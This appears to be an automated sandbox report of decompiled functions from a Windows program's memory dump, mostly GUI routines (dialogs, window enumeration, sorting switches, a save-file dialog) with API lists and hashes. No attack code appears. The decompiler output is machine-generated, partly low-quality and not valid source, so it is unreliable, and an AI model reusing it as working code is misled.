Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A5, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040D12C(__ecx, __ecx, __eflags);
					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
					L5:
					return E004015CE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E00405954(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, 0xffffff);
					SetTextColor(_a8, 0xc00000);
					return GetStockObject(0);
				}
			}

0x0040d4a5
0x0040d4ab
0x0040d4b1
0x0040d4b3
0x0040d4f8
0x0040d502
0x0040d509
0x00000000
0x0040d514
0x0040d4b8
0x00000000
0x0040d4c7
0x0040d4cc
0x0040d4da
0x0040d4e8
0x00000000
0x0040d4f0

APIs

Part of subcall function 00405954: memset.MSVCRT ref: 00405973
Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C

SetBkMode.GDI32(?,00000001), ref: 0040D4CC
SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
GetStockObject.GDI32(00000000), ref: 0040D4F0

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48

Uniqueness

Uniqueness Score: -1.00%

Function 00401482, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401482() {
				intOrPtr _t14;
				struct HWND__* _t17;
				intOrPtr _t25;
				void* _t26;

				if( *0x412394 == 2) {
					ExitProcess(1);
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if( *(_t26 + 0xc) == 0x110) {
					_t17 =  *(_t25 + 0x10);
					 *(_t26 + 0xc) = _t17;
					if( *0x412ecc != 0) {
						EnumChildWindows(_t17, E00406B34, 2);
						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
						E00405D0F( *(_t26 + 0xc), 0x400000);
					}
				}
				if( *((intOrPtr*)(_t25 + 8)) != 0) {
					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
				}
				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
				return E0040E2F1(_t14);
			}

0x0040148c
0x00401490
0x00401490
0x00401496
0x0040149a
0x004014a4
0x004014a6
0x004014a9
0x004014b3
0x004014c4
0x004014cc
0x004014d6
0x004014dc
0x004014b3
0x004014e1
0x004014eb
0x004014eb
0x004014f1
0x004014fd

APIs

ExitProcess.KERNEL32 ref: 00401490
EnumChildWindows.USER32 ref: 004014C4
EnumChildWindows.USER32 ref: 004014CC
SetWindowLongW.USER32 ref: 004014EB

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows$ExitLongProcessWindow
String ID:
API String ID: 2626381504-0
Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3B4, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C3B4(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x413258 == 0) {
					memcpy(0x412668,  *__eax, 0x50);
					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
					 *0x413258 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
					 *0x413258 =  *0x413258 & 0x00000000;
					 *0x412394 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x0040c3bc
0x0040c3be
0x0040c3ce
0x0040c3e0
0x0040c3ed
0x0040c407
0x0040c40d
0x0040c414
0x0040c41c
0x0040c3c0
0x0040c3c4
0x0040c3c4

APIs

memcpy.MSVCRT ref: 0040C3CE
memcpy.MSVCRT ref: 0040C3E0
GetModuleHandleW.KERNEL32(00000000), ref: 0040C3F3
DialogBoxParamW.USER32 ref: 0040C407

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00401712, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				void* _t16;

				_t16 = __edi;
				_t12 = __eax;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				GetClientRect(__eax, __edi + 0x24);
				E00403F55(__edi + 0x14);
				_t13 = GetWindow(GetWindow(_t12, 5), 0);
				while(1) {
					E0040169B(_t9, _t16);
					_t11 = GetWindow(_t13, 2);
					_t13 = _t11;
					if(_t13 == 0) {
						break;
					}
					_t9 = _t13;
				}
				return _t11;
			}

0x00401712
0x00401713
0x0040171b
0x0040171e
0x00401727
0x0040173c
0x00401742
0x00401744
0x0040174c
0x0040174e
0x00401752
0x00000000
0x00000000
0x00401740
0x00401740
0x00401756

APIs

GetClientRect.USER32 ref: 0040171E

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

GetWindow.USER32(?,00000005), ref: 00401737
GetWindow.USER32(00000000), ref: 0040173A

Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB

GetWindow.USER32(00000000,00000002), ref: 0040174C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rectfree$ClientPoints
String ID:
API String ID: 3078297017-0
Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B31A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
				char _v518;
				char _v1028;
				char _v1092;
				signed int _v1100;
				char _v1172;
				char* _v1176;
				intOrPtr _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				void* _t93;
				intOrPtr _t113;
				void* _t114;
				char* _t116;
				intOrPtr _t132;

				_t114 = __edx;
				_t112 = __ecx;
				_push(_t108);
				_t116 = __ecx;
				_v1176 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t142 = _a8 - 0x9c62;
					if(_a8 == 0x9c62) {
						_t108 = _t116;
						_t74 = E0040AD95(_t116, _t142);
					}
					_t143 = _a8 - 0x9c5f;
					if(_a8 == 0x9c5f) {
						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
					}
					if(_a8 == 0x9c5e) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
					}
					if(_a8 == 0x9c5c) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						E0040A3BF(_t116);
						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
					}
					if(_a8 == 0x9c42) {
						_t74 = DestroyWindow( *(_t116 + 0x208));
					}
					if(_a8 == 0x9c49) {
						_t108 = _t116;
						_t74 = E0040B0C2(_t116);
					}
					if(_a8 == 0x9c56) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E0040A6FF(_t116);
					}
					if(_a8 == 0x9c44) {
						_t74 = E00401BDC(_t116, 0x415);
					}
					if(_a8 == 0x9c43) {
						E0040133A( &_v1092);
						_v1092 = 0x410428;
						E00401000( &_v1028, _t112, 0x412290);
						_t108 =  &_v518;
						E00401000( &_v518, _t112, 0x4122c4);
						_t132 = _v1176;
						_push( *((intOrPtr*)(_t132 + 0x208)));
						_push( &_v1092);
						_t93 = 0x70;
						E0040152F(_t93);
						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
						_t74 = E00401357( &_v1100);
						_t116 = _t132;
					}
					_t154 = _a8 - 0x9c41;
					if(_a8 == 0x9c41) {
						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
					}
					if(_a8 != 0x9c47) {
						L27:
						__eflags = _a8 - 0x9c4f;
						if(_a8 != 0x9c4f) {
							L31:
							__eflags = _a8 - 0x9c48;
							if(__eflags == 0) {
								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
							}
							__eflags = _a8 - 0x9c45;
							if(_a8 == 0x9c45) {
								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
								__eflags = 0;
								E0040A1DC(0, _t112, _t116, 0);
								_t74 = E0040A6FF(_t116);
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
							}
							__eflags = _a8 - 0x9c65;
							if(__eflags == 0) {
								_t74 = E0040B054(_t116, __eflags);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								E0040133A( &_v1172);
								_v1100 = _v1100 & 0x00000000;
								_v1172 = 0x40f7a8;
								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
								_t82 = _v1184;
								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
								__eflags =  *((intOrPtr*)(_t113 + 0x224));
								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
										E0040B00A(_t82);
									}
								}
								_v1172 = 0x40f7a8;
								_t74 = E00401357( &_v1172);
								_t116 = _v1176;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c58;
							if(_a8 == 0x9c58) {
								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
							}
							goto L52;
						}
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
							goto L31;
						}
						_push(0xf000);
						_push(0x1000);
						goto L25;
					} else {
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x2000);
						L25:
						_push(0xffffffff);
						_t74 = E004077D8(_t88);
						goto L52;
					}
				} else {
					L52:
					return _t74;
				}
			}

0x0040b31a
0x0040b31a
0x0040b32b
0x0040b32e
0x0040b330
0x0040b334
0x0040b341
0x0040b347
0x0040b349
0x0040b34b
0x0040b34b
0x0040b350
0x0040b356
0x0040b35a
0x0040b35a
0x0040b365
0x0040b36d
0x0040b371
0x0040b375
0x0040b380
0x0040b380
0x0040b38b
0x0040b393
0x0040b397
0x0040b39b
0x0040b3a0
0x0040b3b3
0x0040b3b3
0x0040b3bf
0x0040b3c7
0x0040b3c7
0x0040b3d3
0x0040b3d5
0x0040b3d7
0x0040b3d7
0x0040b3e2
0x0040b3ea
0x0040b3ee
0x0040b3f2
0x0040b3f7
0x0040b3f7
0x0040b402
0x0040b40b
0x0040b40b
0x0040b416
0x0040b41c
0x0040b42d
0x0040b435
0x0040b43a
0x0040b446
0x0040b44b
0x0040b44f
0x0040b459
0x0040b45c
0x0040b45d
0x0040b468
0x0040b471
0x0040b476
0x0040b476
0x0040b478
0x0040b47e
0x0040b482
0x0040b482
0x0040b48d
0x0040b4bf
0x0040b4bf
0x0040b4c5
0x0040b4ed
0x0040b4ed
0x0040b4f3
0x0040b4f7
0x0040b4f7
0x0040b4fc
0x0040b502
0x0040b50a
0x0040b50e
0x0040b512
0x0040b517
0x0040b517
0x0040b51c
0x0040b522
0x0040b528
0x0040b528
0x0040b52d
0x0040b533
0x0040b539
0x0040b539
0x0040b53e
0x0040b544
0x0040b548
0x0040b548
0x0040b54d
0x0040b553
0x0040b559
0x0040b564
0x0040b56e
0x0040b588
0x0040b58d
0x0040b591
0x0040b597
0x0040b59e
0x0040b5a0
0x0040b5a7
0x0040b5a9
0x0040b5a9
0x0040b5a7
0x0040b5b2
0x0040b5b6
0x0040b5bb
0x0040b5bb
0x0040b5bf
0x0040b5c5
0x0040b5cd
0x0040b5cd
0x0040b5d2
0x0040b5d8
0x0040b5e0
0x0040b5e0
0x0040b5e5
0x0040b5eb
0x0040b5f9
0x0040b5f9
0x00000000
0x0040b5eb
0x0040b4c7
0x0040b4cd
0x0040b4d4
0x0040b4e8
0x00000000
0x0040b4e8
0x0040b4d6
0x0040b4db
0x00000000
0x0040b48f
0x0040b48f
0x0040b49c
0x0040b4ba
0x00000000
0x0040b4ba
0x0040b49e
0x0040b4a3
0x0040b4a8
0x0040b4a8
0x0040b4aa
0x00000000
0x0040b4aa
0x0040b5fe
0x0040b5fe
0x0040b604
0x0040b604

APIs

InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
DestroyWindow.USER32(?), ref: 0040B3C7

Strings

33@, xrefs: 0040B569

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyInvalidateRectWindow
String ID: 33@
API String ID: 724544332-1541121659
Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A4C2(void* __eax) {
				void* __ebx;
				void* __edi;
				short* __esi;
				void* _t24;
				int _t27;
				void* _t36;
				intOrPtr* _t43;

				_t36 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
					L11:
					E0040528C();
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						L15:
						goto L1;
					}
					__eflags =  *0x4131d4; // 0x1
					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
					if(__eflags == 0) {
						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
						 *0x4131d4 = 1;
					}
					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
					goto L15;
				} else {
					do {
						__ecx = __esi;
						__eax = E004065EE(__eax, __esi, L"/sort");
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *((intOrPtr*)(__edi + 0x6c0));
							_t4 = __esi + 1; // 0x1
							__ecx = _t4;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
								__ecx = 0x40f454;
							} else {
								__ecx = __eax;
							}
							__eflags =  *__ecx - 0x7e;
							__eax =  *((intOrPtr*)(__edi + 0x69c));
							if(__eflags != 0) {
							} else {
								_push(1);
								__ecx = __ecx + 2;
							}
							_push(__ecx);
							__eax = E0040A084(__eax, __eflags);
						}
						__eax =  *((intOrPtr*)(__edi + 0x6c0));
						__esi = __esi + 1;
						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
					goto L11;
				}
				L1:
				return SetCursor( *0x412390);
			}

0x0040a4c5
0x0040a4d4
0x0040a528
0x0040a528
0x0040a533
0x0040a53e
0x0040a54c
0x0040a551
0x0040a554
0x0040a599
0x00000000
0x0040a59b
0x0040a556
0x0040a55c
0x0040a562
0x0040a56a
0x0040a56f
0x0040a56f
0x0040a585
0x0040a591
0x00000000
0x0040a4d6
0x0040a4d6
0x0040a4db
0x0040a4dd
0x0040a4e2
0x0040a4e4
0x0040a4e6
0x0040a4ec
0x0040a4ec
0x0040a4ef
0x0040a4f2
0x0040a4fd
0x0040a4f4
0x0040a4f9
0x0040a4f9
0x0040a502
0x0040a506
0x0040a50c
0x0040a50e
0x0040a50e
0x0040a510
0x0040a510
0x0040a516
0x0040a517
0x0040a517
0x0040a51c
0x0040a522
0x0040a523
0x0040a523
0x00000000
0x0040a4d6
0x004052a6
0x004052b2

APIs

qsort.MSVCRT ref: 0040A591

Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604

Strings

/sort, xrefs: 0040A4D6
/nosort, xrefs: 0040A547

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040DFD6();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405e84
0x00405e87
0x00405e8b
0x00405e90
0x00405e93
0x00405f05
0x00405e95
0x00405e97
0x00405e99
0x00405e9e
0x00405ea0
0x00405ea3
0x00405ea3
0x00405ead
0x00405eae
0x00405eaf
0x00405eb0
0x00405eb1
0x00405eba
0x00405ebb
0x00405ec3
0x00405ec5
0x00405ec6
0x00405ed4
0x00405ed6
0x00405edb
0x00405ede
0x00405ee6
0x00000000
0x00000000
0x00405ee8
0x00405eec
0x00405eed
0x00405ef3
0x00000000
0x00000000
0x00000000
0x00405ef3
0x00405ef5
0x00405ef5
0x00405ef8
0x00405f01
0x00405f02
0x00405f09

APIs

_snwprintf.MSVCRT ref: 00405EC6
memcpy.MSVCRT ref: 00405ED6

Strings

%2.2X , xrefs: 00405EBB

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00405DCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr _v64;
				wchar_t* _v68;
				intOrPtr _v72;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				wchar_t* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v80 = _v80 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v72 = _t23;
				_v48 = _a8;
				_v36 = _a12;
				_v92 = _t34;
				_v96 = 0x58;
				_v84 = _a4;
				_v68 = _t38;
				_v64 = 0x104;
				_v44 = 0x80806;
				if(GetSaveFileNameW( &_v96) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v72;
					}
					wcscpy(_t38, _v68);
					return 1;
				}
			}

0x00405dcd
0x00405dcd
0x00405dcd
0x00405dd5
0x00405dd8
0x00405dda
0x00405dda
0x00405ddc
0x00405de0
0x00405de4
0x00405de8
0x00405dee
0x00405df4
0x00405df7
0x00405e01
0x00405e08
0x00405e0b
0x00405e0e
0x00405e15
0x00405e24
0x00405e42
0x00405e26
0x00405e28
0x00405e2d
0x00405e2d
0x00405e33
0x00405e3e
0x00405e3e

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
wcscpy.MSVCRT ref: 00405E33

Strings

X, xrefs: 00405E01

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
